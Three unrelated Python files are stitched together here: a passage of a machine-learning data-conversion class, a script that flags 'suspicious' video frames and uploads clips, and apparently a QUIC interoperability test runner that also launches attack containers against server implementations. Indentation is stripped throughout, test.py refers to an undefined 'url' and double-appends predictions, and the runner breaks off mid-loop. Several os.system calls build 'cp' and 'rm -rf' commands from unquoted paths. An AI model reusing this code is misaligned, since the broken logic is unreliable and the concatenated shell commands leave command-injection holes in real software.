def checkSourceFiles(self):
td=self.dataclass()
newsamples=[]
for s in self.sourceList:
logger.info('checking '+self.getSamplePath(s))
if td.fileIsValid(self.getSamplePath(s)):
newsamples.append(s)
else:
print('source file '+s+' seems to be broken, will skip processing it')
return newsamples
def split(self,ratio):
'''
out fraction is (1-ratio)
returns out
modifies self
'''
nin = int(len(self.samples)*(ratio))
if nin < 1:
raise ValueError("DataCollection:split: less than one sample would remain")
if nin == len(self.samples):
raise ValueError("DataCollection:split: less than one sample would be assigned to output")
out=DataCollection()
out.dataDir = self.dataDir
out.dataclass = self.dataclass #anyway just a dummy
out.samples = self.samples[nin:]
self.samples = self.samples[:nin]
if len(self.sourceList) == len(self.samples):
out.sourceList = self.sourceList[nin:]
self.sourceList = self.sourceList[:nin]
else:
self.sourceList = []
out.sourceList = []
#force re-read upon request
self.__nsamples = 0
out.__nsamples = 0
out.weighterobjects = copy.deepcopy(self.weighterobjects)
return out
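    # A minimal usage sketch for split(), assuming a collection that was already
    # written to disk (the .djcdc paths below are hypothetical):
    #
    #   dc = DataCollection()
    #   dc.readFromFile("/data/converted/dataCollection.djcdc")
    #   val_dc = dc.split(0.8)   # dc keeps the first ~80% of the files
    #   dc.writeToFile("/data/converted/train.djcdc")
    #   val_dc.writeToFile("/data/converted/val.djcdc")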
def recoverCreateDataFromRootFromSnapshot(self, snapshotfile):
snapshotfile=os.path.abspath(snapshotfile)
self.readFromFile(snapshotfile)
if len(self.sourceList) < 1:
return
outputDir=os.path.dirname(snapshotfile)+'/'
self.dataDir=outputDir
finishedsamples=len(self.samples)
self.__writeData_async_andCollect(finishedsamples,outputDir)
self.writeToFile(outputDir+'/dataCollection.djcdc')
def getAllLabels(self,nfiles=-1):
return self.extract_features(self.dataclass,'y',nfiles)
def getAllFeatures(self,nfiles=-1):
return self.extract_features(self.dataclass,'x',nfiles)
def getAllWeights(self,nfiles=-1):
return self.extract_features(self.dataclass,'w',nfiles)
def createDataFromRoot(
self, dataclass, outputDir,
redo_meansandweights=True, means_only=False, dir_check=True
):
'''
Also creates a file list of the output files
After the operation, the object will point to the already processed
files (not root files)
Writes out a snapshot of itself after every successfully written output file
to recover the data until a possible error occurred
'''
if len(self.sourceList) < 1:
print('createDataFromRoot: no input root file')
raise Exception('createDataFromRoot: no input root file')
outputDir+='/'
if os.path.isdir(outputDir) and dir_check:
raise Exception('output dir must not exist')
elif not os.path.isdir(outputDir):
os.mkdir(outputDir)
self.dataDir=outputDir
self.samples=[]
self.dataclass=dataclass
td=self.dataclass()
self.weighterobjects = td.createWeighterObjects(self.sourceList)
if self.batch_mode:
for sample in self.sourceList:
self.__writeData(sample, outputDir)
else:
self.__writeData_async_andCollect(0, outputDir)
def __writeData(self, sample, outputDir):
sw=stopwatch()
td=self.dataclass()
fileTimeOut(sample,120) #once available copy to ram
sbasename = os.path.basename(sample)
newname = sbasename[:sbasename.rfind('.')]+'.djctd'
newpath=os.path.abspath(outputDir+newname)
td.writeFromSourceFile(sample, self.weighterobjects, istraining=not self.istestdata, outname=newpath)
print('converted and written '+newname+' in ',sw.getAndReset(),' sec')
self.samples.append(newname)
td.clear()
if not self.batch_mode:
self.writeToFile(outputDir+'/snapshot.djcdc')
def __writeData_async_andCollect(self, startindex, outputDir):
from multiprocessing import Process, Queue, cpu_count, Lock
wo_queue = Queue()
writelock=Lock()
thispid=str(os.getpid())
if not self.batch_mode and not os.path.isfile(outputDir+'/snapshot.djcdc'):
self.writeToFile(outputDir+'/snapshot.djcdc')
tempstoragepath='/dev/shm/'+thispid
logger.info('creating dir '+tempstoragepath)
os.system('mkdir -p '+tempstoragepath)
def writeData_async(index,woq,wrlck):
logger.info('async started')
sw=stopwatch()
td=self.dataclass()
sample=self.sourceList[index]
if self.batch_mode or self.no_copy_on_convert:
tmpinput = sample
def removefile():
pass
else:
tmpinput = tempstoragepath+'/'+str(os.getpid())+'_tmp_'+os.path.basename(sample)
def removefile():
os.system('rm -f '+tmpinput)
import atexit
atexit.register(removefile)
logger.info('start cp')
os_ret=os.system('cp '+sample+' '+tmpinput)
if os_ret:
raise Exception("copy to ramdisk not successful for "+sample)
success=False
out_samplename=''
out_sampleentries=0
sbasename = os.path.basename(sample)
newname = sbasename[:sbasename.rfind('.')]+'.djctd'
newpath=os.path.abspath(outputDir+newname)
try:
logger.info('convertFromSourceFile')
td.writeFromSourceFile(tmpinput, self.weighterobjects, istraining = not self.istestdata, outname=newpath)
print('converted and written '+newname+' in ',sw.getAndReset(),' sec -', index)
out_samplename=newname
out_sampleentries=1
success=True
td.clear()
removefile()
woq.put((index,[success,out_samplename,out_sampleentries]))
except:
print('problem in '+newname)
removefile()
woq.put((index,[False,out_samplename,out_sampleentries]))
raise
def __collectWriteInfo(successful,samplename,sampleentries,outputDir):
if not successful:
raise Exception("write not successful, stopping")
self.samples.append(samplename)
if not self.batch_mode:
self.writeToFile(outputDir+'/snapshot_tmp.djcdc')#avoid to overwrite directly
os.system('mv '+outputDir+'/snapshot_tmp.djcdc '+outputDir+'/snapshot.djcdc')
processes=[]
processrunning=[]
processfinished=[]
for i in range(startindex,len(self.sourceList)):
processes.append(Process(target=writeData_async, args=(i,wo_queue,writelock) ) )
processrunning.append(False)
processfinished.append(False)
nchilds = int(cpu_count()/2)-2 if self.nprocs <= 0 else self.nprocs
#if 'nvidiagtx1080' in os.getenv('HOSTNAME'):
# nchilds=cpu_count()-5
if nchilds<1:
nchilds=1
#nchilds=10
lastindex=startindex-1
alldone=False
results=[]
try:
while not alldone:
nrunning=0
for runs in processrunning:
if runs: nrunning+=1
for i in range(len(processes)):
if nrunning>=nchilds:
break
if processrunning[i]:continue
if processfinished[i]:continue
time.sleep(0.1)
logging.info('starting %s...' % self.sourceList[startindex+i])
processes[i].start()
processrunning[i]=True
nrunning+=1
if not wo_queue.empty():
res=wo_queue.get()
results.append(res)
originrootindex=res[0]
logging.info('finished %s...' % self.sourceList[originrootindex])
processfinished[originrootindex-startindex]=True
processes [originrootindex-startindex].join(5)
processrunning [originrootindex-startindex]=False
#immediately send the next
continue
results = sorted(results, key=lambda x:x[0])
for r in results:
thisidx=r[0]
if thisidx==lastindex+1:
logging.info('>>>> collected result %d of %d' % (thisidx+1,len(self.sourceList)))
__collectWriteInfo(r[1][0],r[1][1],r[1][2],outputDir)
lastindex=thisidx
if nrunning==0:
alldone=True
continue
time.sleep(0.1)
except:
os.system('rm -rf '+tempstoragepath)
raise
os.system('rm -rf '+tempstoragepath)
def convertListOfRootFiles(self, inputfile, dataclass, outputDir,
takeweightersfrom='', means_only=False,
output_name='dataCollection.djcdc',
relpath='', checkfiles=False):
newmeans=True
if takeweightersfrom:
self.readFromFile(takeweightersfrom)
newmeans=False
self.dataclass = dataclass
self.readSourceListFromFile(inputfile, relpath=relpath,checkfiles=checkfiles)
self.createDataFromRoot(
dataclass, outputDir,
newmeans, means_only = means_only,
dir_check= not self.batch_mode
)
self.writeToFile(outputDir+'/'+output_name)
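    # A hedged end-to-end sketch for convertListOfRootFiles(); the text file,
    # the TrainData subclass (MyTrainData) and the output directory are placeholders:
    #
    #   dc = DataCollection()
    #   dc.convertListOfRootFiles("root_files.txt", MyTrainData, "/data/converted",
    #                             checkfiles=True)
    #   # afterwards "/data/converted/dataCollection.djcdc" describes the converted files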
def getSamplePath(self,samplefile):
#for backward compatibility
if samplefile[0] == '/':
return samplefile
return self.dataDir+'/'+samplefile
def extract_features(self, dataclass, selector,nfiles):
import numpy as np
td=self.dataclass()
firstcall=True
count = 0
for sample in self.samples:
            count += 1
td.readFromFile(self.getSamplePath(sample))
#make this generic
thislist=[]
if selector == 'x':
thislist=td.transferFeatureListToNumpy(False)
if selector == 'y':
thislist=td.transferTruthListToNumpy(False)
if selector == 'w':
thislist=td.transferWeightListToNumpy(False)
if firstcall:
out=thislist
firstcall=False
else:
for i in range(0,len(thislist)):
if len(thislist[i].shape) > 1:
out[i] = np.vstack( (out[i], thislist[i] ) )
else:
out[i] = np.append(out[i],thislist[i])
if nfiles > 0:
if count > nfiles:
break
return out
    def __stackData(self, dataclass, selector):
        td = self.dataclass()
        for sample in self.samples:
            td2 = self.dataclass()
            td2.readFromFile(self.getSamplePath(sample))
            td.append(td2)
        return td
def invokeGenerator(self):
generator = TrainDataGenerator()
generator.setBatchSize(self.__batchsize)
generator.setSquaredElementsLimit(self.batch_uses_sum_of_squares)
generator.setFileList([self.dataDir+ "/" + s for s in self.samples])
return generator
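    # Sketch of wiring the generator into a training loop; what the generator
    # yields depends on the chosen TrainData implementation, so treat this as an assumption:
    #
    #   dc = DataCollection()
    #   dc.readFromFile("/data/converted/dataCollection.djcdc")
    #   dc.setBatchSize(128)
    #   gen = dc.invokeGenerator()
    #   # gen now iterates over all files in dc.samples with the configured batch size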
|
test.py
|
from tensorflow import keras
import numpy as np
import cv2, requests
from threading import Thread
from config import *
def notify():
# Token to be inserted here
token = None
# token = "32e07-df8-47b-800-e1ab85df7"
data = {"token": token}
url = "http://localhost:8000/notify/"
# url = "https://trial-ku.herokuapp.com/notify/"
with open(FILE_PATH, 'rb') as f:
response = requests.post(url, data = data, files={'video': f})
print(response.json())
model = keras.models.load_model('./Models/BaseModel.h5')
sent = False
# Live Generator
fc = 0
predictions = []
sus_count = 0
rec = False
cycler = REC_FRAME
out = None  # video writer is created lazily once recording starts
vid = cv2.VideoCapture(url)
while (cv2.waitKey(1) == -1):
ret, frame = vid.read()
if not ret:
break
if fc % 2 == 0:
tmp = cv2.resize(frame, SIZE)
tmp = tmp / 255.0
pred = model.predict(np.array([tmp]))
final = pred[0][0]
predictions.append(final)
if fc > F_AVG:
for i in range(fc-F_AVG, fc):
final += predictions[i]
final /= F_AVG
else:
final = predictions[-1]
predictions.append(final)
if fc <= NOTIFY_THRESH:
sus_count += final
else:
sus_count = sus_count - predictions[fc-NOTIFY_THRESH] + final
        if fc > 0 and sus_count / fc > THRESH:
if not sent:
sent = True
rec = True
if rec:
if out is None:
out = cv2.VideoWriter(FILE_PATH, fourcc, 24, OUTPUT)
if cycler > 0:
ffff = cv2.resize(frame, OUTPUT)
out.write(ffff)
cycler -= 1
else:
cycler = REC_FRAME
rec = False
out.release()
# t1 = Thread(target=notify)
# t1.start()
if final > THRESH:
string = "Suspicious "
else:
string = "Peaceful "
# Showing Frames
string += str(final)
color = (0, 0, 255) if final > THRESH else (255, 0, 0)
frame = cv2.putText(frame, string, org, font, fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow("Video", frame)
fc += 1
vid.release()
cv2.destroyAllWindows()
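# The rolling average above is maintained by hand; a self-contained sketch of the
# same smoothing idea (not part of the original script, window size is assumed):
#
#   from collections import deque
#
#   def make_rolling_mean(window_size):
#       window = deque(maxlen=window_size)
#       def push(value):
#           window.append(value)
#           return sum(window) / len(window)
#       return push
#
#   smooth = make_rolling_mean(F_AVG)
#   smoothed_score = smooth(float(pred[0][0]))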
|
interop.py
|
import json
import logging
import os
import random
import re
import shutil
import statistics
import string
import subprocess
import sys
import tempfile
from datetime import datetime
from typing import Callable, List, Tuple
import prettytable
from termcolor import colored
import testcases
from result import TestResult
from testcases import Perspective
import attacks
from attacks import AttackTarget
import time
import threading
def random_string(length: int):
""" Generate a random string of fixed length """
letters = string.ascii_lowercase
return "".join(random.choice(letters) for i in range(length))
def log_resources(name: str, target: str, log_dir: tempfile.TemporaryDirectory):
cmd = f"docker stats {target} --no-stream --format \"{{{{.CPUPerc}}}}\" >> {log_dir.name}/{name}.log"
while True:
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
class MeasurementResult:
result = TestResult
details = str
class LogFileFormatter(logging.Formatter):
def format(self, record):
msg = super(LogFileFormatter, self).format(record)
# remove color control characters
return re.compile(r"\x1B[@-_][0-?]*[ -/]*[@-~]").sub("", msg)
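    # For example (hedged illustration), "\x1b[32mok\x1b[0m" is reduced to "ok".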
class InteropRunner:
_start_time = 0
test_results = {}
measurement_results = {}
attack_results = {}
compliant = {}
_implementations = {}
_servers = []
_clients = []
_attackers = []
_tests = []
_measurements = []
_attacks = []
_output = ""
_log_dir = ""
_save_files = False
def __init__(
self,
implementations: dict,
servers: List[str],
clients: List[str],
attackers: List[str],
tests: List[testcases.TestCase],
attacks: List[attacks.Attack],
measurements: List[testcases.Measurement],
output: str,
debug: bool,
save_files=False,
log_dir="",
):
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
console = logging.StreamHandler(stream=sys.stderr)
if debug:
console.setLevel(logging.DEBUG)
else:
console.setLevel(logging.INFO)
logger.addHandler(console)
self._start_time = datetime.now()
self._tests = tests
self._measurements = measurements
self._attacks = attacks
self._servers = servers
self._clients = clients
self._attackers = attackers
self._implementations = implementations
self._output = output
self._log_dir = log_dir
self._save_files = save_files
if len(self._log_dir) == 0:
self._log_dir = "logs_{:%Y-%m-%dT%H:%M:%S}".format(self._start_time)
if os.path.exists(self._log_dir):
sys.exit("Log dir " + self._log_dir + " already exists.")
logging.info("Saving logs to %s.", self._log_dir)
for server in servers:
self.test_results[server] = {}
self.measurement_results[server] = {}
for client in clients:
self.test_results[server][client] = {}
for test in self._tests:
self.test_results[server][client][test] = {}
self.measurement_results[server][client] = {}
for measurement in measurements:
self.measurement_results[server][client][measurement] = {}
        # The last for loop could be merged with the one above for better performance, at the cost of readability
attack_targets = [a for a in AttackTarget]
for target in attack_targets:
target_str = target.value
self.attack_results[target_str] = {}
for attacker in attackers:
self.attack_results[target_str][attacker] = {}
if target == AttackTarget.CLIENT:
for client in clients:
self.attack_results[target_str][attacker][client] = {}
if target == AttackTarget.SERVER or target == AttackTarget.BOTH:
for server in servers:
self.attack_results[target_str][attacker][server] = {}
if target == AttackTarget.BOTH:
self.attack_results[target_str][attacker][server][client] = {}
def _is_unsupported(self, lines: List[str]) -> bool:
return any("exited with code 127" in str(line) for line in lines) or any(
"exit status 127" in str(line) for line in lines
)
def _check_impl_is_compliant(self, name: str) -> bool:
""" check if an implementation return UNSUPPORTED for unknown test cases """
if name in self.compliant:
logging.debug(
"%s already tested for compliance: %s", name, str(self.compliant)
)
return self.compliant[name]
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
www_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="compliance_www_")
certs_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="compliance_certs_")
downloads_dir = tempfile.TemporaryDirectory(
dir="/tmp", prefix="compliance_downloads_"
)
testcases.generate_cert_chain(certs_dir.name)
# check that the client is capable of returning UNSUPPORTED
logging.debug("Checking compliance of %s client", name)
cmd = (
"CERTS=" + certs_dir.name + " "
"TESTCASE_CLIENT=" + random_string(6) + " "
"SERVER_LOGS=/dev/null "
"CLIENT_LOGS=" + client_log_dir.name + " "
"WWW=" + www_dir.name + " "
"DOWNLOADS=" + downloads_dir.name + " "
'SCENARIO="simple-p2p --delay=15ms --bandwidth=10Mbps --queue=25" '
"CLIENT=" + self._implementations[name]["image"] + " "
"docker-compose up --timeout 0 --abort-on-container-exit -V sim client"
)
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
if not self._is_unsupported(output.stdout.splitlines()):
logging.error("%s client not compliant.", name)
logging.debug("%s", output.stdout.decode("utf-8"))
self.compliant[name] = False
return False
logging.debug("%s client compliant.", name)
# check that the server is capable of returning UNSUPPORTED
logging.debug("Checking compliance of %s server", name)
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
cmd = (
"CERTS=" + certs_dir.name + " "
"TESTCASE_SERVER=" + random_string(6) + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=/dev/null "
"WWW=" + www_dir.name + " "
"DOWNLOADS=" + downloads_dir.name + " "
"SERVER=" + self._implementations[name]["image"] + " "
"docker-compose up -V server"
)
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
if not self._is_unsupported(output.stdout.splitlines()):
logging.error("%s server not compliant.", name)
logging.debug("%s", output.stdout.decode("utf-8"))
self.compliant[name] = False
return False
logging.debug("%s server compliant.", name)
# remember compliance test outcome
self.compliant[name] = True
return True
def _print_results(self):
"""print the interop table"""
logging.info("Run took %s", datetime.now() - self._start_time)
def get_letters(result):
return "".join(
[test.abbreviation() for test in cell if cell[test] is result]
)
if len(self._tests) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for client in self._clients:
row = [client]
for server in self._servers:
cell = self.test_results[server][client]
res = colored(get_letters(TestResult.SUCCEEDED), "green") + "\n"
res += colored(get_letters(TestResult.UNSUPPORTED), "grey") + "\n"
res += colored(get_letters(TestResult.FAILED), "red")
row += [res]
t.add_row(row)
print(t)
if len(self._measurements) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for client in self._clients:
row = [client]
for server in self._servers:
cell = self.measurement_results[server][client]
results = []
for measurement in self._measurements:
res = cell[measurement]
if not hasattr(res, "result"):
continue
if res.result == TestResult.SUCCEEDED:
results.append(
colored(
measurement.abbreviation() + ": " + res.details,
"green",
)
)
elif res.result == TestResult.UNSUPPORTED:
results.append(colored(measurement.abbreviation(), "grey"))
elif res.result == TestResult.FAILED:
results.append(colored(measurement.abbreviation(), "red"))
row += ["\n".join(results)]
t.add_row(row)
print(t)
if len(self._attacks) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for attacker in self._attackers:
row = [attacker]
#for client in self._clients:
# row = [client]
for server in self._servers:
for attack in self._attacks:
cell = self.attack_results[attack.target().value][attacker][server]
res = colored(get_letters(TestResult.SUCCEEDED), "green") + "\n"
res += colored(get_letters(TestResult.UNSUPPORTED), "grey") + "\n"
res += colored(get_letters(TestResult.FAILED), "red")
row += [res]
t.add_row(row)
print(t)
def _export_results(self):
if not self._output:
return
out = {
"start_time": self._start_time.timestamp(),
"end_time": datetime.now().timestamp(),
"log_dir": self._log_dir,
"servers": [name for name in self._servers],
"clients": [name for name in self._clients],
"attackers": [name for name in self._attackers],
"urls": {
x: self._implementations[x]["url"]
for x in self._servers + self._clients + self._attackers
},
"tests": {
x.abbreviation(): {
"name": x.name(),
"desc": x.desc(),
}
for x in self._tests + self._measurements
},
"attacks": {
x.abbreviation(): {
"name": x.name(),
"desc": x.desc(),
"target": x.target().value
}
for x in self._attacks
},
"quic_draft": testcases.QUIC_DRAFT,
"quic_version": testcases.QUIC_VERSION,
"results": [],
"attack_results": {},
"measurements": [],
}
for target in AttackTarget:
out["attack_results"][target.value] = []
for client in self._clients:
for server in self._servers:
results = []
for test in self._tests:
r = None
if hasattr(self.test_results[server][client][test], "value"):
r = self.test_results[server][client][test].value
results.append(
{
"abbr": test.abbreviation(),
"name": test.name(), # TODO: remove
"result": r,
}
)
out["results"].append(results)
measurements = []
for measurement in self._measurements:
res = self.measurement_results[server][client][measurement]
if not hasattr(res, "result"):
continue
measurements.append(
{
"name": measurement.name(), # TODO: remove
"abbr": measurement.abbreviation(),
"result": res.result.value,
"details": res.details,
}
)
out["measurements"].append(measurements)
for attacker in self._attackers:
for server in self._servers:
attk_results = []
for attack in self._attacks:
r = None
result_table = {}
target = attack.target()
if target == AttackTarget.SERVER:
result_table = self.attack_results[target.value][attacker][server]
elif target == AttackTarget.CLIENT: #TODO: make it work
result_table = self.attack_results[target.value][attacker][client]
elif target == AttackTarget.BOTH: #TODO: make it work
result_table = self.attack_results[target.value][attacker][server][client]
if hasattr(result_table[attack], "value"):
r = result_table[attack].value
                    # In case an error occurred
                    if r is None:
                        r = TestResult.UNSUPPORTED.value
attk_results.append(
{
"abbr": attack.abbreviation(),
"name": attack.name(), # TODO: remove
"result": r,
}
)
out["attack_results"][attack.target().value].append(attk_results)
f = open(self._output, "w")
json.dump(out, f)
f.close()
def _copy_logs(self, container: str, dir: tempfile.TemporaryDirectory):
r = subprocess.run(
'docker cp "$(docker-compose --log-level ERROR ps -q '
+ container
+ ')":/logs/. '
+ dir.name,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if r.returncode != 0:
logging.info(
"Copying logs from %s failed: %s", container, r.stdout.decode("utf-8")
)
def _run_testcase(
self, server: str, client: str, test: Callable[[], testcases.TestCase]
) -> TestResult:
return self._run_test(server, client, None, test)[0]
def _run_test(
self,
server: str,
client: str,
log_dir_prefix: None,
test: Callable[[], testcases.TestCase],
) -> Tuple[TestResult, float]:
start_time = datetime.now()
sim_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_sim_")
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
log_file = tempfile.NamedTemporaryFile(dir="/tmp", prefix="output_log_")
log_handler = logging.FileHandler(log_file.name)
log_handler.setLevel(logging.DEBUG)
formatter = LogFileFormatter("%(asctime)s %(message)s")
log_handler.setFormatter(formatter)
logging.getLogger().addHandler(log_handler)
testcase = test(
sim_log_dir=sim_log_dir,
client_keylog_file=client_log_dir.name + "/keys.log",
server_keylog_file=server_log_dir.name + "/keys.log",
)
print(
"Server: "
+ server
+ ". Client: "
+ client
+ ". Running test case: "
+ str(testcase)
)
reqs = " ".join([testcase.urlprefix() + p for p in testcase.get_paths()])
logging.debug("Requests: %s", reqs)
params = (
"WAITFORSERVER=server:443 "
"CERTS=" + testcase.certs_dir() + " "
"TESTCASE_SERVER=" + testcase.testname(Perspective.SERVER) + " "
"TESTCASE_CLIENT=" + testcase.testname(Perspective.CLIENT) + " "
"WWW=" + testcase.www_dir() + " "
"DOWNLOADS=" + testcase.download_dir() + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=" + client_log_dir.name + " "
'SCENARIO="{}" '
"CLIENT=" + self._implementations[client]["image"] + " "
"SERVER=" + self._implementations[server]["image"] + " "
'REQUESTS="' + reqs + '" '
'VERSION="' + testcases.QUIC_VERSION + '" '
).format(testcase.scenario())
params += " ".join(testcase.additional_envs())
containers = "sim client server " + " ".join(testcase.additional_containers())
cmd = (
params
+ " docker-compose up --abort-on-container-exit --timeout 1 "
+ containers
)
logging.debug("Command: %s", cmd)
status = TestResult.FAILED
output = ""
expired = False
try:
r = subprocess.run(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=testcase.timeout(),
)
output = r.stdout
except subprocess.TimeoutExpired as ex:
output = ex.stdout
expired = True
logging.debug("%s", output.decode("utf-8"))
if expired:
logging.debug("Test failed: took longer than %ds.", testcase.timeout())
r = subprocess.run(
"docker-compose stop " + containers,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=60,
)
logging.debug("%s", r.stdout.decode("utf-8"))
# copy the pcaps from the simulator
self._copy_logs("sim", sim_log_dir)
self._copy_logs("client", client_log_dir)
self._copy_logs("server", server_log_dir)
if not expired:
lines = output.splitlines()
if self._is_unsupported(lines):
status = TestResult.UNSUPPORTED
elif any("client exited with code 0" in str(line) for line in lines):
try:
status = testcase.check()
except FileNotFoundError as e:
logging.error(f"testcase.check() threw FileNotFoundError: {e}")
status = TestResult.FAILED
# save logs
logging.getLogger().removeHandler(log_handler)
log_handler.close()
if status == TestResult.FAILED or status == TestResult.SUCCEEDED:
log_dir = self._log_dir + "/" + server + "_" + client + "/" + str(testcase)
if log_dir_prefix:
log_dir += "/" + log_dir_prefix
shutil.copytree(server_log_dir.name, log_dir + "/server")
shutil.copytree(client_log_dir.name, log_dir + "/client")
shutil.copytree(sim_log_dir.name, log_dir + "/sim")
shutil.copyfile(log_file.name, log_dir + "/output.txt")
if self._save_files and status == TestResult.FAILED:
shutil.copytree(testcase.www_dir(), log_dir + "/www")
try:
shutil.copytree(testcase.download_dir(), log_dir + "/downloads")
except Exception as exception:
logging.info("Could not copy downloaded files: %s", exception)
testcase.cleanup()
server_log_dir.cleanup()
client_log_dir.cleanup()
sim_log_dir.cleanup()
logging.debug("Test took %ss", (datetime.now() - start_time).total_seconds())
# measurements also have a value
if hasattr(testcase, "result"):
value = testcase.result()
else:
value = None
return status, value
def _run_measurement(
self, server: str, client: str, test: Callable[[], testcases.Measurement]
) -> MeasurementResult:
values = []
for i in range(0, test.repetitions()):
result, value = self._run_test(server, client, "%d" % (i + 1), test)
if result != TestResult.SUCCEEDED:
res = MeasurementResult()
res.result = result
res.details = ""
return res
values.append(value)
logging.debug(values)
res = MeasurementResult()
res.result = TestResult.SUCCEEDED
res.details = "{:.0f} (± {:.0f}) {}".format(
statistics.mean(values), statistics.stdev(values), test.unit()
)
return res
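    # For example (hypothetical numbers), three repetitions yielding the values
    # [9.0, 10.0, 11.0] with unit "Mbps" produce res.details == "10 (± 1) Mbps".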
def _run_attack(
self,
server: str,
client: str,
attacker: str,
attack: Callable[[], attacks.Attack],
log_dir_prefix: None,
) -> Tuple[TestResult, float]:
start_time = datetime.now()
sim_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_sim_")
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
attacker_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_attacker_")
log_file = tempfile.NamedTemporaryFile(dir="/tmp", prefix="output_log_")
log_handler = logging.FileHandler(log_file.name)
log_handler.setLevel(logging.DEBUG)
formatter = LogFileFormatter("%(asctime)s %(message)s")
log_handler.setFormatter(formatter)
logging.getLogger().addHandler(log_handler)
testcase = attack(
sim_log_dir=sim_log_dir,
attacker_log_dir=attacker_log_dir,
client_keylog_file=client_log_dir.name + "/keys.log",
server_keylog_file=server_log_dir.name + "/keys.log",
)
additional_print = ""
if attack.target() != AttackTarget.SERVER:
additional_print = ". Client: "+ client
print(
"Server: "
+ server
+ additional_print
+ ". Running attack: "
+ str(testcase)
)
reqs = " ".join([testcase.urlprefix() + p for p in testcase.get_paths()])
logging.debug("Requests: %s", reqs)
params = (
"WAITFORSERVER=server:443 "
"CERTS=" + testcase.certs_dir() + " "
"TESTCASE_SERVER=" + testcase.testname(Perspective.SERVER) + " "
"TESTCASE_CLIENT=" + testcase.testname(Perspective.CLIENT) + " "
"WWW=" + testcase.www_dir() + " "
"DOWNLOADS=" + testcase.download_dir() + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=" + client_log_dir.name + " "
'SCENARIO="{}" '
"ATTACKER="+ self._implementations[attacker]["image"] + " "
"ATTACK="+ testcase.name() + " "
"CLIENT=" + self._implementations[client]["image"] + " "
"SERVER=" + self._implementations[server]["image"] + " "
'REQUESTS="' + reqs + '" '
'VERSION="' + testcases.QUIC_VERSION + '" '
).format(testcase.scenario())
params += " ".join(testcase.additional_envs())
containers = "sim client server attacker" + " ".join(testcase.additional_containers())
cmd = (
params
+ " docker-compose up --timeout 1 "
+ containers
)
logging.debug("Command: %s", cmd)
attk_name = attack.name()
res_logger = threading.Thread(target=log_resources, args=(attk_name,"server", attacker_log_dir))
res_logger.start()
status = TestResult.FAILED
output = ""
expired = False
try:
r = subprocess.run(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=testcase.timeout(),
)
output = r.stdout
except subprocess.TimeoutExpired as ex:
output = ex.stdout
expired = True
logging.debug("%s", output.decode("utf-8"))
res_logger.join(timeout=0.1)
if expired:
logging.debug("Attack ended after %ds.", testcase.timeout())
r = subprocess.run(
"docker-compose stop " + containers,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=60,
)
logging.debug("%s", r.stdout.decode("utf-8"))
# copy the pcaps from the simulator
self._copy_logs("sim", sim_log_dir)
self._copy_logs("client", client_log_dir)
self._copy_logs("server", server_log_dir)
self._copy_logs("attacker", attacker_log_dir)
lines = output.splitlines()
if self._is_unsupported(lines):
status = TestResult.UNSUPPORTED
else:
try:
status = testcase.check()
except FileNotFoundError as e:
logging.error(f"testcase.check() threw FileNotFoundError: {e}")
status = TestResult.FAILED
# save logs
logging.getLogger().removeHandler(log_handler)
log_handler.close()
if status == TestResult.FAILED or status == TestResult.SUCCEEDED:
config = attacker + "_" + server
if attack.target() != AttackTarget.SERVER:
config += "_" + client
log_dir = self._log_dir + "/" + config + "/" + str(testcase)
if log_dir_prefix:
log_dir += "/" + log_dir_prefix
shutil.copytree(server_log_dir.name, log_dir + "/server")
shutil.copytree(client_log_dir.name, log_dir + "/client")
shutil.copytree(sim_log_dir.name, log_dir + "/sim")
shutil.copytree(attacker_log_dir.name, log_dir + "/attacker")
shutil.copyfile(log_file.name, log_dir + "/output.txt")
if self._save_files and status == TestResult.FAILED:
shutil.copytree(testcase.www_dir(), log_dir + "/www")
try:
shutil.copytree(testcase.download_dir(), log_dir + "/downloads")
except Exception as exception:
logging.info("Could not copy downloaded files: %s", exception)
testcase.cleanup()
server_log_dir.cleanup()
client_log_dir.cleanup()
sim_log_dir.cleanup()
#attacker_log_dir.cleanup()
logging.debug("Test took %ss", (datetime.now() - start_time).total_seconds())
# measurements also have a value
if hasattr(testcase, "result"):
value = testcase.result()
else:
value = None
return status, value
def run(self):
"""run the interop test suite and output the table"""
nr_failed = 0
for server in self._servers:
for client in self._clients:
logging.debug(
"Running with server %s (%s) and client %s (%s)",
server,
self._implementations[server]["image"],
client,
self._implementations[client]["image"],
)
if not (
self._check_impl_is_compliant(server)
and self._check_impl_is_compliant(client)
):
logging.info("Not compliant, skipping")
continue
# run the test cases
for testcase in self._tests:
status = self._run_testcase(server, client, testcase)
